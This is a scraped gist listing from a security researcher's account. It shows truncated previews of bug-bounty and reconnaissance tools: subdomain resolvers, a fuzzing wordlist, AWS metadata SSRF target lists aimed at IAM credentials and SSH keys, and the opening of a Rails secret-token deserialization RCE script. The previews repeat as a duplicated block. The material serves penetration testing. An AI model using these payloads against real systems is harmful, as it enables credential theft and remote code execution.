Shunmugha Sundaram shamrocksu88

## testss.svg

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                shamrocksu88
                / testss.svg
            
            
              Created
              March 6, 2017 21:48
            
          
      Sorry, something went wrong. Reload?
      Sorry, we cannot display this file.
      Sorry, this file is invalid so it cannot be displayed.
      
          Viewer requires iframe.
      
    
## recon.rb
#Tool based on a resolver.rb by @melvinsh
#Original Repository: https://github.com/melvinsh/subresolve
#Modified by @ehsahil for Personal Use.
require 'socket'
require 'colorize'

begin
  file = File.open(ARGV[0], "r")
rescue
  puts "Usage: ruby resolve.rb wordlist"

## all.txt

.
..
........
@
*
*.*
*.*.*
ðŸŽ

## cloud_metadata.txt
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

## rails-secret-token-rce.rb
#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others
require 'base64'
require 'openssl'
require 'optparse'
require 'open-uri'
SECRET_TOKEN = "SECRET HERE"
code = "eval('`COMMAND HERE`')"
    marshal_payload = Base64.encode64(
      "\x04\x08" +
      "o" +

## crt.sh
#!/bin/bash
#
# crt.sh sub-domain check by 1N3@CrowdShield
# https://crowdshield.com
#

OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'

## second-order.py
# coding=utf-8
# python3

from urllib.parse import urlparse

import requests
import urllib3

from bs4 import BeautifulSoup

## cloud_metadata.txt
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname

## introspection-query.graphql

  query IntrospectionQuery {
    __schema {
      queryType { name }
      mutationType { name }
      subscriptionType { name }
      types {
        ...FullType
      }
      directives {

## ghe-revealer.rb
#!/usr/bin/sudo ruby

#
# revealer.rb -- Deobfuscate GHE .rb files.
#
# This is simple:
# Every obfuscated file in the GHE VM contains the following code:
#
# > require "ruby_concealer.so"
# > __ruby_concealer__ "..."
	#Tool based on a resolver.rb by @melvinsh
	#Original Repository: https://github.com/melvinsh/subresolve
	#Modified by @ehsahil for Personal Use.
	require 'socket'
	require 'colorize'

	begin
	file = File.open(ARGV[0], "r")
	rescue
	puts "Usage: ruby resolve.rb wordlist"
	## AWS
	# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

	http://169.254.169.254/latest/user-data
	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/ami-id
	http://169.254.169.254/latest/meta-data/reservation-id
	http://169.254.169.254/latest/meta-data/hostname
	http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
	#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others
	require 'base64'
	require 'openssl'
	require 'optparse'
	require 'open-uri'
	SECRET_TOKEN = "SECRET HERE"
	code = "eval('`COMMAND HERE`')"
	marshal_payload = Base64.encode64(
	"\x04\x08" +
	"o" +
	#!/bin/bash
	#
	# crt.sh sub-domain check by 1N3@CrowdShield
	# https://crowdshield.com
	#

	OKBLUE='\033[94m'
	OKRED='\033[91m'
	OKGREEN='\033[92m'
	OKORANGE='\033[93m'
	# coding=utf-8
	# python3

	from urllib.parse import urlparse

	import requests
	import urllib3

	from bs4 import BeautifulSoup
	## AWS
	# Amazon Web Services (No Header Required)
	# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
	http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
	http://169.254.169.254/latest/user-data
	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/ami-id
	http://169.254.169.254/latest/meta-data/reservation-id
	http://169.254.169.254/latest/meta-data/hostname

	query IntrospectionQuery {
	__schema {
	queryType { name }
	mutationType { name }
	subscriptionType { name }
	types {
	...FullType
	}
	directives {
	#!/usr/bin/sudo ruby

	#
	# revealer.rb -- Deobfuscate GHE .rb files.
	#
	# This is simple:
	# Every obfuscated file in the GHE VM contains the following code:
	#
	# > require "ruby_concealer.so"
	# > __ruby_concealer__ "..."